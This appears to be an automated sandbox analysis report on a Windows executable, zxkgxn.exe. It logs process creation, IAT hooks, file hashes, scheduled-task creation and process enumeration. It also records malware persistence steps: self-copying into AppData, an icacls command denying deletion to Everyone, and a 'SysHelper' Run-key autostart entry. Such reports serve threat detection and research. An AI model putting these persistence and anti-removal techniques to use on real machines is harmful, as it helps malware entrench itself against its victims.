333de00d...16da

Monitored Processes

Process Overview

ID	PID	Monitor Reason	Integrity Level	Image Name	Command Line	Origin ID
#1	0xa14	Analysis Target	High (Elevated)	zxkgxn.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe"	-
#3	0xb00	Child Process	High (Elevated)	icacls.exe	icacls "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36" /deny *S-1-1-0:(OI)(CI)(DE,DC)	#1
#4	0x50c	Created Scheduled Job	High (Elevated)	taskeng.exe	taskeng.exe {0E3013FB-5D32-4499-A940-035C87CD1A3B} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:Highest[1]	#1
#5	0xb10	Child Process	High (Elevated)	zxkgxn.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe" --Admin IsNotAutoStart IsNotTask	#1
#6	0xb3c	Created Scheduled Job	Medium	taskeng.exe	taskeng.exe {E387FC81-F75C-4FE1-BEB5-A923C4A8692A} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]	#1
#7	0xb5c	Child Process	Medium	zxkgxn.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --Task	#6
#11	0x4d8	Autostart	Medium	zxkgxn.exe	"C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --AutoStart	-

Behavior Information - Grouped by Category

Process #1: zxkgxn.exe

670

Information	Value
ID	#1
File Name	c:\users\5p5nrgjn0js halpmcxz\desktop\zxkgxn.exe
Command Line	"C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe"
Initial Working Directory	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor	Start Time: 00:00:26, Reason: Analysis Target
Unmonitor	End Time: 00:00:46, Reason: Self Terminated
Monitor Duration	00:00:19

OS Process Information

Information	Value
PID	0xa14
Parent PID	0x45c (c:\windows\explorer.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x A18 0x A50 0x A54 0x A58 0x A5C 0x A60 0x A64 0x A68 0x AF8 0x AFC 0x B0C

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	Actions
zxkgxn.exe	0x00400000	0x004A2FFF	Relevant Image	-	32-bit	-	... Region Actions Download Dump
buffer	0x00678E20	0x006BDC4B	Marked Executable	-	32-bit	-	... Region Actions Download Dump
buffer	0x00678E20	0x006BDC4B	Content Changed	-	32-bit	0x0067A22D, 0x00679902	... Region Actions Download Dump
buffer	0x00678E20	0x006BDC4B	Content Changed	-	32-bit	0x0067A081, 0x00679DF8	... Region Actions Download Dump
zxkgxn.exe	0x00400000	0x004A2FFF	Process Termination	-	32-bit	-	... Region Actions Download Dump Go to AV Match

Hook Information

Type	Installer	Target	Size	Information	Actions
IAT	private_0x0000000000620000:+0x5a5df	1. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x6a00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	5. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitForSingleObject+0x0 now points to private_0x000000007fff0000:+0x4784078b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	6. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetTapeParameters+0x0 now points to private_0x000000007fff0000:+0x68868904	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	7. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleW+0x0 now points to private_0x000000007fff0000:+0x600fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	8. entry of zxkgxn.exe	4 bytes	kernel32.dll:ExpandEnvironmentStringsA+0x0 now points to private_0x000000007fff0000:+0x78868bc0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	9. entry of zxkgxn.exe	4 bytes	kernel32.dll:WaitNamedPipeW+0x0 now points to private_0x000000007fff0000:+0xa00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	10. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumTimeFormatsA+0x0 now points to private_0x000000007fff0000:+0x7ffcf0bd	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	11. entry of zxkgxn.exe	4 bytes	kernel32.dll:LoadLibraryW+0x0 now points to private_0x000000007fff0000:+0x7c8a0fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	12. entry of zxkgxn.exe	4 bytes	kernel32.dll:Sleep+0x0 now points to private_0x000000007fff0000:+0x3010008	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	13. entry of zxkgxn.exe	4 bytes	kernel32.dll:FormatMessageW+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	14. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeExW+0x0 now points to private_0x000000007fff0000:+0x70eaffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	16. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetSystemDirectoryA+0x0 now points to private_0x000000007fff0000:+0x7ffce88d	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	17. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateMailslotW+0x0 now points to private_0x000000007fff0000:+0x37100aff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	18. entry of zxkgxn.exe	4 bytes	kernel32.dll:WritePrivateProfileStringW+0x0 now points to private_0x000000007fff0000:+0x50c283c2	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	19. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReplaceFileA+0x0 now points to private_0x000000007fff0000:+0x58ac103	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	20. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesA+0x0 now points to private_0x000000007fff0000:+0x8000fbe8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	21. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileIntA+0x0 now points to private_0x0000000000050000:+0x3cae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	22. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetLastError+0x0 now points to private_0x000000007fff0000:+0x42b80f00	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	28. entry of zxkgxn.exe	4 bytes	kernel32.dll:FindFirstVolumeMountPointW+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	29. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProfileStringA+0x0 now points to private_0x000000007fff0000:+0x510ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	32. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetDefaultCommConfigA+0x0 now points to private_0x000000007fff0000:+0x7cea0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	33. entry of zxkgxn.exe	4 bytes	kernel32.dll:VirtualProtect+0x0 now points to private_0x000000007fff0000:+0xc00fffe	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	34. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	36. entry of zxkgxn.exe	4 bytes	kernel32.dll:MoveFileWithProgressW+0x0 now points to private_0x000000007fff0000:+0x40841475	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	37. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleProcessList+0x0 now points to pagefile_0x0000000000a90000:+0x228102	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	38. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x9010010	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	39. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStringTypeW+0x0 now points to private_0x000000007fff0000:+0x7ffcf885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	40. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadConsoleW+0x0 now points to private_0x000000007fff0000:+0x7edee9ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	41. entry of zxkgxn.exe	4 bytes	kernel32.dll:ReadFile+0x0 now points to private_0x000000007fff0000:+0x4b84ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	42. entry of zxkgxn.exe	4 bytes	kernel32.dll:OutputDebugStringW+0x0 now points to private_0x000000007fff0000:+0x7ed6e910	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	44. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetStdHandle+0x0 now points to private_0x000000007fff0000:+0x69d90b58	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	45. entry of zxkgxn.exe	4 bytes	kernel32.dll:EnumSystemLocalesW+0x0 now points to private_0x000000007fff0000:+0x8000fed9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	46. entry of zxkgxn.exe	4 bytes	kernel32.dll:HeapFree+0x0 now points to private_0x000000007fff0000:+0x7bf9858b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	47. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEncodePointer+0x0 now points to private_0x000000007fff0000:+0x3710ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	49. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCommandLineA+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	50. entry of zxkgxn.exe	4 bytes	kernel32.dll:RaiseException+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	52. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0xb177534	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	54. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlEnterCriticalSection+0x0 now points to private_0x000000007fff0000:+0x1cb81	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	55. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlLeaveCriticalSection+0x0 now points to private_0x000000007fff0000:+0x58a0000	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	56. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetStdHandle+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	57. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetFileType+0x0 now points to private_0x000000007fff0000:+0x7fff9ae9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	59. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetProcessHeap+0x0 now points to private_0x000000007fff0000:+0x3d8c2375	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	60. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	62. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleHandleExW+0x0 now points to private_0x000000007fff0000:+0xb177532	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	64. entry of zxkgxn.exe	4 bytes	kernel32.dll:AreFileApisANSI+0x0 now points to private_0x000000007fff0000:+0xe381	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	65. entry of zxkgxn.exe	4 bytes	kernel32.dll:MultiByteToWideChar+0x0 now points to private_0x000000007fff0000:+0x58affff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	66. entry of zxkgxn.exe	4 bytes	kernel32.dll:WideCharToMultiByte+0x0 now points to private_0x000000007fff0000:+0x8000fbf8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	67. entry of zxkgxn.exe	4 bytes	ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x7fff72e9	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	68. entry of zxkgxn.exe	4 bytes	kernel32.dll:CloseHandle+0x0 now points to private_0x000000007fff0000:+0x53c66ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	69. entry of zxkgxn.exe	4 bytes	kernel32.dll:SetLastError+0x0 now points to private_0x000000007fff0000:+0x8000fb8c	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	72. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetModuleFileNameA+0x0 now points to private_0x000000007fff0000:+0x7ffc8885	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	73. entry of zxkgxn.exe	4 bytes	kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x7e850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	75. entry of zxkgxn.exe	4 bytes	kernel32.dll:QueryPerformanceCounter+0x0 now points to private_0x000000007fff0000:+0x7b99853b	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	76. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcessId+0x0 now points to private_0x000000007fff0000:+0x410ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	79. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeEnvironmentStringsW+0x0 now points to private_0x0000000000050000:+0x2e884	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	83. entry of zxkgxn.exe	4 bytes	kernel32.dll:CreateEventW+0x0 now points to private_0x000000007fff0000:+0x7ffc9085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	84. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x52850fff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	86. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsAlloc+0x0 now points to private_0x000000007fff0000:+0x4c8689c0	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	87. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsGetValue+0x0 now points to private_0x000000007fff0000:+0xe00fffb	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	88. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsSetValue+0x0 now points to private_0x000000007fff0000:+0x7ffce085	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	89. entry of zxkgxn.exe	4 bytes	kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x5486c7ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	92. entry of zxkgxn.exe	4 bytes	kernel32.dll:FatalAppExitA+0x0 now points to private_0x000000007fff0000:+0x7bd9b5ff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	93. entry of zxkgxn.exe	4 bytes	kernel32.dll:IsValidCodePage+0x0 now points to private_0x000000007fff0000:+0x6853ffff	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	95. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetOEMCP+0x0 now points to private_0x000000007fff0000:+0x690dc483	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	97. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleCP+0x0 now points to private_0x000000007fff0000:+0x3c3b70f	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	98. entry of zxkgxn.exe	4 bytes	kernel32.dll:GetConsoleMode+0x0 now points to private_0x000000007fff0000:+0xf1064f8	... Actions Go to Installer Region Go to Target Region
IAT	private_0x0000000000620000:+0x5a5df	101. entry of zxkgxn.exe	4 bytes	kernel32.dll:FreeLibrary+0x0 now points to private_0x000000007fff0000:+0x78840000	... Actions Go to Installer Region Go to Target Region

Dropped Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	564.50 KB	MD5: 8312fe0b372ea144637254f5c27fbcc0 SHA1: 994d3647da0e03470799609ee07d15c78d823e91 SHA256: 333de00da48f4c3020580aa11633c7b026d2277254130332982c1db5656816da SSDeep: 12288:8qxFTUDQIwFUnjvkwWiNUYH0CrWTIhek:8UFTUDgUDBgYH0CyTEek	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\x9ohk109\geo[1].json	465 bytes	MD5: d6727470681ecc2ca56bbd0486b4fa97 SHA1: 693756ab251ef2d82a91d94a2e5b78a9604d8bac SHA256: 8b37ae3083eb3bb497d0de9aa0f48e4fa2b893726e2a9787e6dad0ecd40d9613 SSDeep: 12:YCJcjmdVQVCRbwXhCdEVQVPB8yPt0fRbIRAJdxFQVyrhmXoB2SH4:YODQVCRbwxCCQVvV0fRbI2JdxFQVyNm5	... File Actions Show Properties Download
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	564.58 KB	MD5: 2d1e092f6eefda0d1c839f60c3ef6fc3 SHA1: 48694837d355daa1f5d3e44b5dd846c3e23fb5b0 SHA256: 9761218a4e9b77112907173a4f9c5965968c0439bc1bb8eda5c078eed8c1d159 SSDeep: 12288:DcUaagn2MPFUnjvkwWiNUYH0CrWTIheky:oUUUDBgYH0CyTEeky	... File Actions Show Properties Download

Modified Files

Filename	File Size	Hash Values	Actions
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	564.58 KB	MD5: 2d1e092f6eefda0d1c839f60c3ef6fc3 SHA1: 48694837d355daa1f5d3e44b5dd846c3e23fb5b0 SHA256: 9761218a4e9b77112907173a4f9c5965968c0439bc1bb8eda5c078eed8c1d159 SSDeep: 12288:DcUaagn2MPFUnjvkwWiNUYH0CrWTIheky:oUUUDBgYH0CyTEeky	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat	64.00 KB	MD5: 2db89fb48fd886b621627751f2ae15ed SHA1: e2f78c6a535f4ba230a4470402b6f905f0b4c066 SHA256: dfc9aeb2ad6900a7b836db92a36a9d2162c84551134c0291757cc352206a3166 SSDeep: 384:gnjyLKYBfFVZJptKF2KTFZTCzXTtX+Yih9aX5Jqiq+AN:6OLKYBdVZJptKF2KTFZTCzp++8	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat	32.00 KB	MD5: 74d69403f4a938faa28298c110bc71c3 SHA1: c016f27979d48a90bb341ccf7ffef41a3955f4d5 SHA256: 8b9d3a6a22778e368c9e81397e2b1af64b9739f7ade535966708f34bcf6eada9 SSDeep: 48:qMhaLouhzppiksLSLWFM+AWi3QTGnbYbQWy58V4l9:qO7appiksLSLaH0QCnMbQ5ll9	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat	64.00 KB	MD5: 76ea69d031194d578f075f215a90c906 SHA1: 6e85f36bf2e987bc577e4d866a0d04030f8b0b14 SHA256: bc11f0c78d4c9bd699f887c822942c2a7e515fd251e98edc3dfd3322e0cf38ac SSDeep: 768:5ARzWYjmjVjKx6C7vn9KwiOIpX38FE53tdJ:5QzWYjmjVjKx6cvn9KwiOIpXKE53tdJ	... File Actions Show Properties Download
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\ietldcache\index.dat	256.00 KB	MD5: 6852149628dae385c68c7a9db7028560 SHA1: c6e02c929ec99f984b04876816024c3a39b88ccb SHA256: 53ae38a5bdbd72f76bf578f6c36e0b54a994003f535dbc1b469c12f3a169e3a4 SSDeep: 384:p8JEJH45Y0z6hKO59HqXRIhHPQ3NGjt3hAJnNH0kHf9QV9wRULzArvCCjgnF5TRy:pTHcEt8jdjFQg2cEbcaaoQARz40LG	... File Actions Show Properties Download

Host Behavior

COM (8)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	TaskScheduler	ITaskService	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Execute	TaskScheduler	ITaskService	method_name = Connect, server_name = 95, domain = 95, password = 4289035	1	Fn
Execute	TaskScheduler	ITaskService	method_name = GetFolder, path = \, new_interface = ITaskFolder	1	Fn
Execute	TaskScheduler	ITaskService	method_name = NewTask, new_interface = ITaskDefinition	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Triggers, new_interface = ITriggerCollection	1	Fn
Execute	TaskScheduler	ITriggerCollection	method_name = Create, type = TASK_TRIGGER_TIME, new_interface = IDailyTrigger	1	Fn
Execute	TaskScheduler	IDailyTrigger	method_name = put_StartBoundary, start_boundary = 2019-06-30T19:02:03	1	Fn
Execute	TaskScheduler	ITaskDefinition	method_name = get_Actions, new_interface = IActionCollection	1	Fn

File (9)

Operation	Filename	Additional Information	Count	Logfile
Create Directory	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36	-	1	Fn
Open	STD_INPUT_HANDLE	-	2	Fn
Open	STD_OUTPUT_HANDLE	-	2	Fn
Open	STD_ERROR_HANDLE	-	2	Fn
Copy	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe	source_filename = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	1	Fn
Delete	C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe	-	1	Fn

Registry (4)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	-	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = 0, type = REG_NONE	1	Fn
Write Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run	value_name = SysHelper, data = "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\23aa8f91-8e4c-4e01-8a6f-bd3657c0ac36\zxkgxn.exe" --AutoStart, size = 210, type = REG_EXPAND_SZ	1	Fn

Process (49)

Operation	Process	Additional Information	Count	Logfile
Create	icacls	os_pid = 0xb00, creation_flags = CREATE_DETACHED_PROCESS, CREATE_IDLE_PRIORITY_CLASS, startup_flags = STARTF_USESHOWWINDOW, show_window = SW_HIDE	1	Fn
Create	C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\zxkgxn.exe	show_window = SW_SHOW	1	Fn
Enumerate Processes	-	-	1	Fn
Open	System	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\smss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\wininit.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\csrss.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\winlogon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\services.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsass.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\lsm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\audiodg.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\dwm.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\explorer.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\spoolsv.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\svchost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskeng.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\windows\system32\taskhost.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\microsoft visual studio 8\mechanicalalicedevelopers.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft sql server compact edition\operatingarrowjackets.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\msbuild\spine.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows sidebar\pump_wrapped_trustee.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows mail\wendy.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\windows photo viewer\editorial.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\common files\weekend.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows media player\assessment_rocky.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\uninstall information\consequences.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\microsoft analysis services\adoption_hits.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\internet explorer\iron.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\adobe\chemistry_poker_supports.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files (x86)\mozilla maintenance service\ronald radiation.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\windows photo viewer\sustainable alignment charged.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
Open	c:\program files\dvd maker\colon.exe	desired_access = PROCESS_VM_READ, PROCESS_QUERY_INFORMATION	1	Fn
